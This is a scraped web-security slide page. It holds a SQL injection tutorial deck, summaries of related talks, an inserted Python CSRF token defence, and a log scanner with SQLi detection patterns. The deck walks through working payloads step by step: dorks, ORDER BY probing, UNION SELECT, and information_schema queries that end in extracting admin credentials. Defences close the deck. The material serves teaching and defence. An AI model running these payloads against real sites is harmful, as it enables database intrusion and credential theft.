Widespread security flaws in web application development
* SQL Injection - Hands-On Example
* Cross-Site Scripting (XSS)
* Cross-Site Request Forgery
* HTTP Strict Transport Security
Cross-Site Request Forgery (CSRF for short) is a kind of web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the active session of one of its authorized users.
In simple words, it's when an "evil" website posts a new status to your Twitter account when you visit it while your login session on Twitter is still active.
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content.
As browser configurations may be modified, the best way to protect a web application against CSRF is to secure the web application itself.
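One way for the application to protect itself, as the passage above recommends, is a session-bound synchronizer token that every state-changing request must echo back, with an Origin/Referer check as defence in depth. This is an added example, not code from the presentation; the Session and Request models, handle_post_status and the origins are constructed assumptions standing in for a real framework.

```python
"""Synchronizer-token CSRF protection, as a stand-alone illustration.

Constructed example: a minimal server-side model of a session-bound
anti-CSRF token and the checks a state-changing endpoint should run.
Session, Request and handle_post_status are hypothetical, not a framework API.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional, Tuple
from urllib.parse import urlsplit

SITE_ORIGIN = "https://app.example"  # constructed: the protected site's own origin


@dataclass
class Session:
    """Server-side session; the token is bound to it and never readable cross-site."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))
    statuses: list = field(default_factory=list)


@dataclass
class Request:
    """The parts of an HTTP request that matter for the CSRF decision."""
    method: str
    headers: dict
    form: dict
    session: Optional[Session]  # resolved from the session cookie by the framework


def render_status_form(session: Session) -> str:
    """Embed the token as a hidden field; a page on another origin cannot read it."""
    return (
        '<form method="post" action="/status">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
        '<input name="text"><button>Post</button></form>'
    )


def origin_allowed(headers: dict) -> bool:
    """Defence in depth: if Origin (or Referer) is present it must be our own origin."""
    src = headers.get("Origin") or headers.get("Referer")
    if src is None:
        return True  # some legitimate clients send neither; the token check still applies
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def csrf_check(req: Request) -> Tuple[bool, str]:
    """Return (ok, reason). Only state-changing methods are subject to the check."""
    if req.method in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"
    if req.session is None:
        return False, "no session"
    if not origin_allowed(req.headers):
        return False, "origin mismatch"
    submitted = req.form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be recovered byte by byte.
    if not hmac.compare_digest(submitted.encode(), req.session.csrf_token.encode()):
        return False, "missing or invalid csrf token"
    return True, "ok"


def handle_post_status(req: Request) -> int:
    """POST /status: 403 when the CSRF check fails, 200 after recording the status."""
    ok, _reason = csrf_check(req)
    if not ok:
        return 403
    req.session.statuses.append(req.form.get("text", ""))
    return 200


def demo() -> dict:
    """Constructed scenario: a same-site form post versus a forged cross-site post."""
    sess = Session(user="alice")
    legit = Request("POST", {"Origin": SITE_ORIGIN},
                    {"csrf_token": sess.csrf_token, "text": "hello"}, sess)
    # The browser attaches alice's session cookie to a form auto-submitted from the
    # evil site, but that page never saw the token and its Origin header is its own.
    forged = Request("POST", {"Origin": "https://evil.example"},
                     {"text": "pwned"}, sess)
    return {"legit": handle_post_status(legit),
            "forged": handle_post_status(forged),
            "statuses": list(sess.statuses)}


if __name__ == "__main__":
    print(demo())
```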
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN - Samvel Gevorgyan
"Web Application Security is a vast topic and time is not enough to cover all kinds of malicious attacks and techniques for avoiding them, so now we will focus on top 10 high level vulnerabilities. Web developers work in different ways using their custom libraries and intruder prevention systems and now we will see what they should do and should not do based on best practices."
- Samvel Gevorgyan
[ Presentation on Scribd ]
http://www.scribd.com/doc/47157267
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter... - Quek Lilian
A live hacking session demonstrating the different tools and techniques used by hackers, with an in-depth understanding of the problems of insecure applications and the solutions to the vulnerabilities.
Owasp top 10 web application security hazards - Part 1 - Abhinav Sejpal
Mission: Understand / Learn / Practice OWASP Web Security Vulnerabilities (https://www.owasp.org/index.php/Top102013-Top_10). In this session, attendees will perform hands-on exercises to get a better understanding of the OWASP top ten security threats.
Injecting Security into vulnerable web apps at Runtime - Ajin Abraham
Web Application Security is not hard, but it's easy to get it wrong, as writing secure code is not as easy as preaching it. So to overcome incidents arising from such unforeseen events, organisations tend to rely on Web Application Firewalls or WAFs. Web Application Firewalls have been in the industry for a long time. Every one of them works either outside or around the web application and acts by intercepting the HTTP request coming to the web server, then decides whether to allow or block the request based on traditional signature checks. They are never aware of what is happening inside the application: how the user input is getting interpreted, whether the application/server is under heavy load, whether the attacker is exfiltrating data by exploiting an SQLi that the WAF couldn't detect, etc. The strength of a traditional WAF depends on manual or predefined rules/signatures. As a result, they have the limitation that they will get bypassed if a payload is not present in their signature list. In the occurrence of a zero day, a WAF in most cases won't be able to prevent an attack as they don't know the signature of the exploit yet.
In this talk I will share my research outcomes on implementing a runtime application patching algorithm on an insecurely coded application to make it secure against code injection vulnerabilities and other logical issues related to web applications. I will introduce the next-generation web application defending technology dubbed Runtime Application Self-Protection (RASP), which works by understanding your application to defend against web attacks from inside the web application. RASP relies on runtime patching to inject security into web apps implicitly without introducing additional code changes. The root cause of all code injection vulnerabilities is that the language interpreter cannot distinguish between data and code. The proposed solution will detect code context breakout to effectively detect and prevent code injections with the help of runtime hooking and patching at the framework API or language API level. The research focuses mainly on detecting and preventing vulnerabilities like SQL Injection, Cross-Site Scripting, Remote Command Execution, HTTP Verb Tampering, Header Injection, File Upload Bypass, Path Traversal, etc., and other application security challenges like Session Hijacking, Credential Stuffing and Layer 7 DDoS. This research is carried out by implementing a RASP module for a vulnerable web application written in Python using the Tornado framework with an SQLite backend.
Top 10 Web Security Vulnerabilities (OWASP Top 10) - Brian Huff
The document summarizes the top 10 security vulnerabilities in web applications according to the Open Web Application Security Project (OWASP). These include injection flaws, cross-site scripting, broken authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, insecure cryptographic storage, failure to restrict URL access, insufficient transport layer protection, and unvalidated redirects and forwards. Countermeasures for each vulnerability are also provided.
The document summarizes the OWASP Top 10 security threats. It describes each of the top 10 threats, including injection, broken authentication, cross-site scripting, insecure direct object references, security misconfiguration, sensitive data exposure, missing access controls, cross-site request forgery, use of vulnerable components, and unsafe redirects/forwards. For each threat, it provides a brief explanation of the meaning and potential impacts, such as data loss, account compromise, or full host takeover. The document encourages implementing people, process, and technology measures to address application security issues.
The document discusses the OWASP API Security Top 10 project which aims to raise awareness of common API vulnerabilities. It highlights some frequent issues like input validation problems, insecure configurations, and data/exception leakage. The document also demonstrates examples of these vulnerabilities using a vulnerable demo API called Pixi.
Secure coding is the practice of developing software securely by avoiding security vulnerabilities. It involves understanding the application's attack surface and using techniques like input validation, secure authentication, access control, and encrypting sensitive data. The OWASP organization provides free tools and guidelines to help developers code securely, such as their Top 10 security risks and cheat sheets on issues like injection, authentication, and access control. Developers should use static and dynamic application security testing tools to identify vulnerabilities and continuously learn about secure coding best practices.
Owasp Top 10 And Security Flaw Root Causes - Marco Morana
The document discusses root causes of common web application security flaws and vulnerabilities known as the OWASP Top 10. It provides an overview of tactical and strategic approaches to address these issues, including threat modeling, mapping vulnerabilities to application architecture, and implementing security by design principles. Specific guidelines are given for securely handling authentication, authorization, cryptography, sessions, input validation, errors and logging.
This document summarizes a webinar about minimizing the impact of the December 2015 Patch Tuesday updates. It includes an overview of the Microsoft and third party patches released, including 12 Microsoft security bulletins addressing 71 vulnerabilities and an Adobe Flash Player bulletin addressing 78 vulnerabilities. It also provides details on some of the most critical patches, including patches addressing remote code execution vulnerabilities in Windows 10, Internet Explorer, Edge, and other Microsoft products. The webinar aims to help organizations understand and address the patches.
This document discusses analysis of web application penetration testing. It provides statistics on common vulnerabilities like SQL injection, XSS, and file inclusion. It then covers methodologies for information gathering, understanding application logic, observing normal behavior, and targeted testing. A variety of tools for penetration testing are listed, along with search queries that can be used during reconnaissance. The document discusses benefits of penetration testing like protecting companies and meeting compliance. It concludes with recommendations for securing web applications like keeping software updated, input validation, code reviews, and runtime monitoring.
A walkthrough of web application defense strategies, based around the Open Web Application Security Project's top 10 list. Presented to the Classic City Developers Meetup in August 2017.
The bare minimum that you should know about web application security testing ... - Ken DeSouza
The document provides an overview of common tools and techniques for web application security testing. It discusses STRIDE/DREAD frameworks for threat modeling and identifying vulnerabilities. It also summarizes the OWASP Top 10 list of risks and demonstrates tools like ZAP, Wireshark, SQLMap and tcpdump for analyzing applications, networks and detecting SQL injection flaws. The document advocates threat modeling to explain security issues to various stakeholders and provides references for further reading.
Web Application Penetration Testing Introduction - gbud7
This document provides an overview of web application penetration testing. It discusses the goals of testing to evaluate security by simulating attacks. The testing process involves gathering information, understanding normal application behavior, and then applying targeted techniques to find weaknesses. The document outlines the reconnaissance, mapping, and active testing phases. It also demonstrates various tools like Burp Suite, W3AF, and SQL injection and cross-site scripting attacks.
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks - Andre Van Klaveren
A presentation of the OWASP Top 10 2017 release candidate, expected to be finalized in summer 2017. Presented at the St. Louis CYBER meetup on Wednesday, June 7, 2017.
Abusing Exploiting and Pwning with Firefox Addons - Ajin Abraham
This document outlines security vulnerabilities in Firefox add-ons and demonstrates proof of concept exploits. It discusses how Firefox add-ons have full privileges without sandboxing, allowing exploits like keyloggers and downloading executables. Attack techniques to spread malicious add-ons like social engineering and tabnabbing are described. Mitigations include updating Firefox, using antivirus software, and disabling session restoring. The document aims to demonstrate weaknesses to motivate the Firefox team to improve add-on security.
The document discusses various vulnerabilities in web servers and web applications. It covers popular web servers like IIS, Apache, and others. It then discusses attacking vulnerabilities in web servers like sample files, source code disclosure, canonicalization, and buffer overflows. It also discusses vulnerabilities in web applications like cross-site scripting, SQL injection, cross-site request forgery, and HTTP response splitting. It provides examples of exploits and recommendations for countermeasures to secure web servers and applications.
The document provides guidelines for secure coding. It discusses the evolution of software markets and increased security threats. Common web attacks like injection, broken authentication, and sensitive data exposure are explained. The OWASP Top 10 list of vulnerabilities is reviewed. The document emphasizes the importance of secure coding practices like input validation, output encoding, and using components with no known vulnerabilities. Following a secure coding lifestyle can help developers write more secure code and protect against attacks.
Introduction to Web Application Penetration Testing - Anurag Srivastava
Web Application Pentesting
* A process to check and penetrate the security of a web application or a website
* The process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities
* Any security issues that are found will be presented to the system owner, together with an assessment of the impact, a proposal for mitigation or a technical solution.
This document provides guidelines for secure coding practices to avoid vulnerabilities. It discusses common vulnerabilities like buffer overflows, integer overflows, format string attacks, command injections, and cross-site scripting that result from insecure coding practices in languages like C, C++, Java, and those used for web applications. The document emphasizes that secure coding alone is not enough and security needs to be incorporated throughout the entire software development lifecycle. It also provides examples of insecure code that could enable each type of vulnerability discussed.
OWASP Serbia - A3 broken authentication and session management - Nikola Milosevic
Account credentials and session tokens are often not properly protected, allowing unauthorized access to user accounts. Flaws in authentication and session management can undermine security controls and privacy. Attackers exploit weaknesses like ineffective logout processes, password management, and session timeouts to hijack user sessions by stealing or guessing credentials and session tokens. Application developers must implement secure authentication, strong password policies, session management best practices like early session expiration, and logging to prevent such attacks.
The document provides an overview of web application security. It discusses what web application security entails, which is achieving an acceptable level of security for a web application solution. It explains why web application security is important given increased reliance on web apps and their global accessibility. It outlines some common security risks like browser hijacking, cookie theft, and denial of service attacks. It also discusses how security problems should be addressed earlier in the development lifecycle to reduce costs. The document then delves into specific vulnerabilities like hidden field manipulation, cookie poisoning, buffer overflows, and cross-site scripting attacks. Examples are provided to illustrate how attackers can exploit these vulnerabilities.
Web applications are prone to hacking because web developers are often not well-versed in security issues. The top web vulnerabilities are cross-site scripting (XSS), SQL injection, input validation issues, and remote file inclusion. XSS attacks involve injecting malicious code into web pages through user input. SQL injection occurs when user input is not sanitized before being used in SQL queries, allowing attackers to alter queries. Proper input validation and sanitization on both the client- and server-sides are needed to prevent many security bugs. Browser vulnerabilities can also potentially expose issues in web applications if not properly designed with security in mind. Constant vigilance is required to address new attacks and protect applications and users.
The document summarizes the OWASP API Security Top 10 - 2019, which outlines the top 10 most critical API security risks. It includes an introduction to the OWASP API Security Top 10 project, release notes on the first edition, a description of the risk rating methodology used, and summaries of the top 10 risks which are: 1) Broken Object Level Authorization, 2) Broken Authentication, 3) Excessive Data Exposure, 4) Lack of Resources & Rate Limiting, 5) Broken Function Level Authorization.
Technology First
16th Annual Ohio Information Security Conference
OISC 2019
#OISC19
The OWASP Top 10 & AppSec Primer
By Matt Scheurer (@c3rkah)
Dayton, Ohio
Date: 03/13/2019
Abstract:
Are you testing the security of your web applications, web sites, and web servers? The malicious threat actors on the Internet almost certainly are. We will cover AppSec along with a brief review of the 2017 OWASP Top 10 List. The focus of the presentation is how to get started with AppSec and where to continue learning more. Accompanying the presentation are live demos of Nikto and the OWASP Zed Attack Proxy (ZAP).
Bio:
Matt Scheurer serves as Chair of the Cincinnati Networking Professionals Association Security Special Interest Group (CiNPA Security SIG) and works as a Systems Security Engineer in the Financial Services industry. He holds a CompTIA Security+ Certification and possesses multiple Microsoft Certifications including MCP, MCPS, MCTS, MCSA, and MCITP. He has presented on numerous Information Security topics as a featured speaker at many local area technology groups and large Information Security conferences all over the Ohio, Indiana, and Kentucky Tri-State. Matt maintains active memberships in a number of professional organizations including the Association for Computing Machinery (ACM), Cincinnati Networking Professionals Association (CiNPA), Financial Services - Information Sharing and Analysis Center (FS-ISAC), and Information Systems Security Association (ISSA).
Get Ready for Web Application Security Testing - Alan Kan
The document discusses web application security testing and provides guidance for testing professionals. It outlines some of the top attacks like SQL injection and cross-site scripting. It recommends getting educated on security topics, using tools like WebScarab and IBM Rational AppScan to test for vulnerabilities, and incorporating security testing into the development process.
This document provides an agenda for a presentation on comprehensive web application attacks. The presenter, Ahmed Sherif, has over 5 years of experience in penetration testing and web application security. The agenda includes an overview of security in corporations and web technologies, the OWASP security testing methodology, common web attacks like XSS and SQL injection, and a demo of these attacks. The goal is to educate attendees on how to identify and address vulnerabilities in web applications.
Get Ready for Web Application Security TestingAlan Kan
The document discusses web application security testing and provides guidance for testing professionals. It outlines some of the top attacks like SQL injection and cross-site scripting. It recommends getting educated on security topics, using tools like WebScarab and IBM Rational AppScan to test for vulnerabilities, and incorporating security testing into the development process.
This document provides an agenda for a presentation on comprehensive web application attacks. The presenter, Ahmed Sherif, has over 5 years of experience in penetration testing and web application security. The agenda includes an overview of security in corporations and web technologies, the OWASP security testing methodology, common web attacks like XSS and SQL injection, and a demo of these attacks. The goal is to educate attendees on how to identify and address vulnerabilities in web applications.
This is an introduction to application security, covering some core concepts and the most important practices when creating secure code.
It was developed by Mike McBryde and Bryant Zadegan (during our day job) and released under the Creative Commons. It was first delivered to OWASP DC on March 4, 2015.
The document discusses how web application hacking occurs through examples like SQL injection. It explains the basic components of a web application like the database, server, and client. It then covers the steps an attacker may take, like using tools to find hidden content or exploiting vulnerabilities in how user input is handled to access private user data or delete database tables. The document emphasizes that these types of vulnerabilities are common and provides resources for learning about different hacking techniques as well as the company's security assessment services.
Web Insecurity And Browser ExploitationMichele Orru'
This document provides an outline for a seminar on web insecurity and browser exploitation. It introduces the speaker and their background and experience. The seminar will discuss the top 25 security errors from SANS, with practical demonstrations of vulnerabilities in real world web applications. Specific vulnerabilities that will be covered include improper input validation, improper output encoding, information leaks in error messages, SQL injection, and cross-site scripting. Mitigation strategies and frameworks for each vulnerability will also be discussed. Practical examples of discovered vulnerabilities are provided for selected websites.
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
View the on-demand recording: http://securityintelligence.com/events/avoiding-application-attacks/
Your organization is running fast to build your business. You are developing new applications faster than ever and utilizing new cloud-based development platforms. Your customers and employees expect applications that are powerful, highly usable, and secure. Yet this need for speed coupled with new development techniques is increasing the likelihood of security issues.
How can you meet the needs of speed to market with security? Hear Paul Ionescu, IBM Security, Ethical Hacking Team Lead discuss:
- How application attacks work
- Open Web Application Security Project (OWASP) goals
- How to build defenses into your applications
- The 10 most common web application attacks, including demos of the infamous Shellshock and Heartbleed vulnerabilities
- How to test for and prevent these types of threats
Caleb Sima is the founder and CTO of SPI Dynamics, a security company. He has over 11 years of experience in security and is a frequent speaker on topics like exploiting web security vulnerabilities and hacking web applications. The document discusses various web application vulnerabilities like SQL injection, cross-site scripting, and session hijacking, and provides examples of exploiting these vulnerabilities on real websites.
Make sure you’re defending against the most common web security issues and attacks with this useful overview of software development best-practices. We'll go over the most common attacks against web applications and present real world advice for defending yourself against these types of attacks.
Introduction to Web Application Penetration TestingRana Khalil
Intro to web application penetration testing workshop I held in Atlanta as part of the AnitaBorg Cybersecurity Weekend on Aug. 19. The link for the event can be found here: https://community.anitab.org/event/atl-cybersecurity-day-two/
This document discusses software security and common vulnerabilities in web applications such as SQL injection and cross-site scripting (XSS). It explains that SQL injection exploits vulnerabilities in database applications by injecting malicious SQL code via user input, while XSS injects client-side scripts by storing malicious code in websites. The document demonstrates how these attacks work and can be used to steal sensitive data or inject malware onto users' computers. It emphasizes the importance of validating, sanitizing, and escaping all user input to prevent such vulnerabilities.
Cyber Security Workshop @SPIT- 3rd October 2015Nilesh Sapariya
Got Invited for conducting the workshop on ‘Cyber Security’ at top notch engineering college.
Sardar Patel Institute of Technology, Andheri on 3rd October, 2015.
Student feedback:-
https://drive.google.com/file/d/0B_uWWP1uW7TFWVdTanJFdTlqNkE/view?usp=sharing
Appreciation letter:-
https://drive.google.com/file/d/0B_uWWP1uW7TFMkVVUTR4V1JTN2c/view?usp=sharing
Uncover What's Inside the Mind of a HackerIBM Security
View On-demand Webinar: https://securityintelligence.com/events/uncover-whats-inside-mind-hacker/
A simple software vulnerability can make the bad guys very wealthy. A bustling new market for software vulnerabilities is emerging. An operating system vulnerability can be worth as much as $1 million on the black market.
Ethical Hacker Paul Ionescu aims to put a dent in the bad guys’ pockets by helping developers to “put their hackers’ hats on” and prevent software vulnerabilities.
During this presentation, Paul:
- Demos common software programming flaws
- Discusses notable security breaches that were caused by vulnerabilities such as SQL Injection
- Examines ways to implement software defenses that prevent security flaws from re-emerging
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEAjith Kp
A slide show on the subject web application vulnerabilities. It contains how the vulnerabilities evolves, how to detect, how to exploit and how to defense against the vulnerabilities with example.
The document summarizes the OWASP 2013 top 10 list of web application security risks. It provides descriptions and examples for each of the top 10 risks: 1) Injection, 2) Broken Authentication and Session Management, 3) Cross-Site Scripting (XSS), 4) Insecure Direct Object References, 5) Cross-Site Request Forgery (CSRF), 6) Security Misconfiguration, 7) Sensitive Data Exposure, 8) Missing Function Level Access Control, 9) Using Components with Known Vulnerabilities, and 10) Unvalidated Redirects and Forwards. Protection strategies are also outlined for each risk.
This document summarizes recent trends in web application security vulnerabilities. Client-side attacks like XSS remain prominent along with emerging threats involving mobile and cloud technologies. Old vulnerabilities persist in widely used software like PHP and Apache. The growth of IoT and "smart" devices introduces many new insecure products. Overall, new technologies are often released without security testing, while older software houses long-standing flaws. The document concludes that as applications and networks grow more complex, so too will security issues, requiring continued research and vigilance.
[2.1] Web application Security Trends - Omar GanievOWASP Russia
This document summarizes recent trends in web application security vulnerabilities. Client-side attacks like XSS remain prominent along with emerging threats involving cloud computing, big data, and the Internet of Things. Old vulnerabilities persist in widely used software while new issues are found in new technologies. Overall, the growth of web applications and their interactions creates many new attack surfaces despite ongoing security improvements, ensuring hackers will continue finding novel ways to exploit systems.
IBM AppScan - the total software security solution, Content:
- Introduction to security
- Best Practices for Application Security
- IBM AppScan security solution
- DEMO
Social Enterprise Rises! …and so are the Risks - DefCamp 2012DefCamp
The document discusses social enterprise software and associated security risks. It provides an overview of social enterprise software, why organizations use it, and common deployment models. It then discusses some common security risks like data loss, exploitation of vulnerabilities, and social engineering. The document outlines strategies for risk mitigation and examines several case studies of vulnerabilities found in social enterprise software solutions. It emphasizes that even large vendors can overlook application security and stresses the importance of verification testing.
Hackers versus Developers and Secure Web ProgrammingAkash Mahajan
This document discusses hackers and developers and their different perspectives. Hackers try to find weaknesses and gain access in unintended ways, while developers aim to create secure systems. It notes that hackers only need one opening to exploit a system, while developers must constantly work to maintain security. The good fight is about making secure apps and safeguarding data, and hackers play a necessary role in incentivizing developers. Web app security risks include injection attacks and compromising user data. Developers must validate all untrusted input and encode output to build integrity.
Widespread security flaws in web application development 2015
1. Widespread security flaws in web application development
Martin Ahchiev
Content is available under a Creative Commons 3.0 License unless otherwise noted.
2.
FOCUS ON COMMON SECURITY CHALLENGES
YOU ALREADY NEED TO KNOW WEB PROGRAMMING
3.
FACT: THE VAST MAJORITY OF WEB APPLICATIONS HAVE SECURITY VULNERABILITIES!
MOST DEVELOPERS ARE NOT AWARE OF THE ISSUES
5. Most Sites Not Secure
Attackers can access unauthorized data!
They use your website to attack your users
We will cover many attacks later in this demo
6. HTTP History
The WEB wasn’t designed to be secure!
Built for static, read-only pages
Almost no intrinsic security
A few security features were “bolted on” later
Security and defensive development style
7. (Diagram: where attacks land in a web application.) Components: BROWSER, FIREWALL, WEB SERVER, WEB SERVICE, AUTH SERVICE, ACCESS CONTROL, DATABASE. Attacks placed on the diagram: XSS, CSRF, PACKET SNIFFING, FORGED TOKEN, DIRECT OBJECT REFERENCE, SQL INJECTION, DIRECTORY TRAVERSAL, XML INJECTION.
8. Ranking of Web Security Vulnerabilities
OWASP - The Ten Most Critical Web Application Security Risks
SANS Institute - CWE/SANS TOP 25 Most Dangerous Software Errors
Organizations that contributed vulnerability statistics: Aspect Security, MITRE, Softtek, White Hat
9. In next 10 minutes…
SQL Injection Explained
Hands-On Example
The Basic Fixes
More Resources
10. OWASP Top 10 - 2013
INJECTION ATTACKS ARE A SERIOUS PROBLEM
“SQL Injection is an old problem – so I don’t have to worry about it”
11. OWASP Top 10 - 2013
13. Typical Scenario
(Diagram: Bob types his name in the browser; the value "Bob" is passed to the WEB SERVER and on into the DATABASE query.)
In Application Code:
    // Vulnerable, as shown on the slide: the user-supplied name is concatenated into the SQL text
    private void queryDB(String u_name) {
        String sql = "SELECT * FROM users WHERE name = '" + u_name + "'";
        doQuery(sql);
    }
17. SQL Injection Attack
(Diagram: the same flow, but the browser input is now Bob' or '1'='1' and it is passed unchanged to the WEB SERVER and the DATABASE.)
In Application Code:
    // The same vulnerable code as in the Typical Scenario
    private void queryDB(String u_name) {
        String sql = "SELECT * FROM users WHERE name = '" + u_name + "'";
        doQuery(sql);
    }
18. SQL Injection Attack
DATABASE receives:
    SELECT * FROM users WHERE name = 'Bob' or '1'='1'
JUST RETURNS ROWS FOR Bob OR WHENEVER ONE EQUALS ONE (ALL ROWS)
19. Hands-On Example: Step 1
HOW ATTACKERS SEARCH FOR TARGETS
DORKS (search-engine queries)
EXAMPLES:
1. "details.php?id=xxx"
2. "gallery.php?id="
3. inurl:"products.php?prodID="
20. Hands-On Example: Step 2
HOW ATTACKERS TEST TARGETS FOR VULNERABILITIES
http://www.localhost:999/newsdetails.aspx?id=51
21. Hands-On Example: Step 3
HOW ATTACKERS TEST TARGETS FOR VULNERABILITIES
Let’s add a single quote ' at the end of the URL:
http://www.localhost:999/newsdetails.aspx?id=51'
SQL Code:
    SELECT * FROM NEWS WHERE id = 51'
22. Hands-On Example: Step 4
Finding the number of columns
NoError/Error statements
"order by X--" where "X" is an integer guess; whether the page errors or not tells whether X exceeds the number of columns
EXAMPLE:
http://www.localhost:999/newsdetail.php?id=51 order by 12--
23. Hands-On Example: Step 4
How about we go down a bit to "order by 5--"
http://www.localhost:999/newsdetail.php?id=51 order by 5--
http://www.localhost:999/newsdetail.php?id=51 order by 4--
24. Hands-On Example: Step 5
How attackers find Vulnerable Columns
UNION SELECT command
EXAMPLE:
    SELECT * FROM users UNION SELECT * FROM admin
http://www.localhost:999/newsdetail.php?id=51+union+select+1,2,3
25. Hands-On Example: Step 5
How attackers find Vulnerable Columns
INVALIDATE THE FIRST QUERY
EXAMPLES:
http://www.localhost:999/newsdetail.php?id=51+union+select+1,2,3
1. http://www.localhost:999/newsdetail.php?id=51+and+0+union+select+1,2,3
2. http://www.localhost:999/newsdetail.php?id=51+and+false+union+select+1,2,3
3. http://www.localhost:999/newsdetail.php?id=-51+union+select+1,2,3
4. http://www.localhost:999/newsdetail.php?id=null+union+select+1,2,3
5. http://www.localhost:999/newsdetail.php?id=51+&&+0+union+select+1,2,3
26. Hands-On Example: Step 5
How attackers find Vulnerable Columns
EXAMPLES:
http://www.localhost:999/newsdetail.php?id=-51+union+select+1,2,3
27. Hands-On Example: Step 6
Obtaining the SQL Version
@@version
http://www.localhost:999/newsdetail.php?id=-51+union+select+1,@@version,3
convert(@@version using latin1)
http://www.localhost:999/newsdetail.php?id=-51+union+select+1,convert(@@version using latin1),3
unhex(hex(@@version))
http://www.localhost:999/newsdetail.php?id=-51+union+select+1,unhex(hex(@@version)),3
28. Hands-On Example: Step 6
Obtaining the SQL Version
database() - find the current database
user() - find the user information
@@hostname - current hosting info
@@datadir - directory of the data of the website
29. Hands-On Example: Step 7
Obtaining the Table Names
information_schema.tables
http://www.localhost:999/newsdetail.php?id=-51+union+select+1,table_name,3+from+information_schema.tab
group_concat()
http://www.localhost:999/newsdetail.php?id=-51+union+select+1,group_concat(table_name),3 from information_schema.tables
30. Hands-On Example: Step 8
Obtaining the Column Names from Table Names
information_schema.columns instead of information_schema.tables
column_name instead of table_name
+from+information_schema.columns where table_name=TableNameHEX - tblAdmin (the table name written as a hex literal; 0x74626c61646d696e decodes to tbladmin)
http://www.localhost:999/newsdetail.php?id=-51+union+select+1,group_concat(column_name),3 from information_schema.columns where table_name=0x74626c61646d696e--
31. Hands-On Example: Step 9
Getting Data from Columns
concat() function
Separator = 0x3a (a hex for a colon " : ")
table name = tbladmin
http://www.md5decrypter.co.uk
http://www.localhost:999/newsdetail.php?id=-51+union+select+1,concat(username,0x3a,password),3+from+tblAdmin
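The probing sequence in Steps 3 to 9 leaves a recognisable trail in web server access logs. As an added example that is not part of the slides, here is detection logic run over a constructed Common Log Format sample built from the deck's own URLs; the indicator names, the regular expressions and the log lines (documentation-range addresses) are my own.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the probing steps on the slides: a single quote after a numeric id,
# ORDER BY column counting, UNION SELECT, information_schema, server variables, string
# functions and a trailing comment. They are checked in this order on the decoded, lowercased URL.
INDICATORS = [
    ("quote_after_number", re.compile(r"=-?[0-9]+'")),
    ("order_by_probe", re.compile(r"\border\s+by\s+[0-9]+")),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("information_schema", re.compile(r"\binformation_schema\.")),
    ("server_variable", re.compile(r"@@[a-z_]+")),
    ("sql_function", re.compile(r"\b(?:group_concat|concat|database|user|unhex|hex|convert)\s*\(")),
    ("comment_terminator", re.compile(r"--\s*$")),
]

# Common Log Format: the client address comes first, the request line is quoted.
CLF_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<path>\S+) HTTP')

# Constructed access log (assumption for this example); the request paths are the deck's URLs.
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2015:13:55:36 +0000] "GET /newsdetail.php?id=51 HTTP/1.1" 200 1043',
    '203.0.113.5 - - [10/Oct/2015:13:55:40 +0000] "GET /newsdetail.php?id=51%27 HTTP/1.1" 500 512',
    '203.0.113.5 - - [10/Oct/2015:13:55:48 +0000] "GET /newsdetail.php?id=51+order+by+12-- HTTP/1.1" 500 512',
    '203.0.113.5 - - [10/Oct/2015:13:56:02 +0000] "GET /newsdetail.php?id=-51+union+select+1,@@version,3 HTTP/1.1" 200 1102',
    '203.0.113.5 - - [10/Oct/2015:13:56:30 +0000] "GET /newsdetail.php?id=-51+union+select+1,group_concat(table_name),3+from+information_schema.tables HTTP/1.1" 200 1388',
    '198.51.100.7 - - [10/Oct/2015:13:57:01 +0000] "GET /gallery.php?id=7 HTTP/1.1" 200 2210',
]


def classify_request(path):
    """Return the names of every indicator that matches the URL-decoded request path."""
    decoded = unquote_plus(path).lower()
    return [name for name, pattern in INDICATORS if pattern.search(decoded)]


def scan_log(lines):
    """Return (line_index, client_ip, indicators) for each request carrying at least one indicator."""
    hits = []
    for i, line in enumerate(lines):
        m = CLF_LINE.match(line)
        if not m:
            continue  # not a request line in the expected shape; skip rather than guess
        found = classify_request(m.group("path"))
        if found:
            hits.append((i, m.group("ip"), found))
    return hits


def flagged_by_source(lines):
    """Count flagged requests per client: several probes from one source in a short window is the signal."""
    counts = {}
    for _, ip, _ in scan_log(lines):
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for index, ip, found in scan_log(LOG_LINES):
        print(index, ip, ", ".join(found))
    print(flagged_by_source(LOG_LINES))
```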
32. SQL Injection
SQL INJECTION = HUGE RISK
CAN COMPROMISE ALL YOUR DATA
SINGLE INJECTION FLAW CAN LEAD TO COMPLETE SERVER TAKEOVER!
33. Defense Against SQL Injection
HOW CAN WE DEFEND OURSELVES?
Prepared Statements
Stored Procedures
Escaping All User Supplied Input
Least Privilege
White List Input Validation
34. Parameterized Queries
Prepared Statements
    String custname = request.getParameter("customerName"); // Data from user - this should REALLY be validated
    String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";
    PreparedStatement pstmt = connection.prepareStatement(query);
    pstmt.setString(1, custname); // bound as a value, never parsed as part of the SQL
    ResultSet results = pstmt.executeQuery();
35. Parameterized Queries
Stored Procedures
    String custname = request.getParameter("customerName"); // This should REALLY be validated
    try {
        CallableStatement cs = connection.prepareCall("{call sp_getAccountBalance(?)}");
        cs.setString(1, custname);
        ResultSet results = cs.executeQuery();
        // … result set handling
    } catch (SQLException se) {
        // … logging and error handling
    }
